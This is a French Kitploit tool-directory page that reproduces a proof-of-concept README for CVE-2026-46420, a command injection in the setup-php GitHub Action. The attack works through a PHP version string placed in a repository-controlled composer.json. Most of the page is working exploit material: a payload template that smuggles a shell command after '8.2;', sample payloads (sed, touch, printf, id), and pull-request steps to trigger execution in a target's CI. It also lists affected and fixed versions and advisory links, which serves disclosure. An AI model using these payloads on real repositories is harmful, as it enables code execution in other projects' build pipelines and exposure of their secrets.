Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/jvr2022/cve-2026-46420
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubjvr2022/cve-2026-46420

CVE-2026-46420

PoC pour CVE-2026-46420, injection de commande dans shivammathur/setup-php via la résolution de version PHP contrôlée par le dépôt.

Voir le dépôt
110il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-46420 PoC

Injection de commande dans shivammathur/setup-php lorsque la version de PHP est chargée à partir de fichiers contrôlés par le dépôt.

Versions concernées :

root@kitploit:~
>= 2.25.0, < 2.37.1

Version corrigée :

root@kitploit:~
>= 2.37.1

PoC

Le dépôt cible possède déjà un workflow vulnérable qui extrait le contenu de la pull request et exécute [email protected].

L'attaquant ne modifie que composer.json.

root@kitploit:~
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]

Lorsque setup-php lit la version de PHP depuis composer.json, la commande injectée est incluse dans le script shell généré puis exécutée.

Résultat :

root@kitploit:~
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc

Reproduction

Créez une branche à partir du dépôt cible :

root@kitploit:~
git checkout -b poc-test

Remplacez le composer.json d'origine par la version PoC :

root@kitploit:~
cp attacker/composer.json composer.json

Commitez et poussez :

root@kitploit:~
git add composer.json
git commit -m "update composer config"
git push -u origin poc-test

Ouvrez une pull request de poc-test vers main.

L'exécution des Actions devrait montrer que demo-app/.env.example a été modifié pendant l'étape setup-php.

Changer la commande

Le format du payload est :

root@kitploit:~
8.2;<COMMAND> #

Payload actuel :

root@kitploit:~
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #

La commande exécutée est :

root@kitploit:~
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example

Pour modifier ce que fait le PoC, remplacez la commande située entre 8.2; et #.

Créer un fichier :

root@kitploit:~
8.2;touch poc-executed #

Écrire dans un fichier :

root@kitploit:~
8.2;printf 'poc executed\n' > poc-result.txt #

Afficher la sortie de la commande :

root@kitploit:~
8.2;id #

Exemple de composer.json :

root@kitploit:~
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}

Correctif

Mettez à niveau vers [email protected] ou une version plus récente.

Le même payload est rejeté sur la version corrigée.

Références

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b

Télécharger l’outil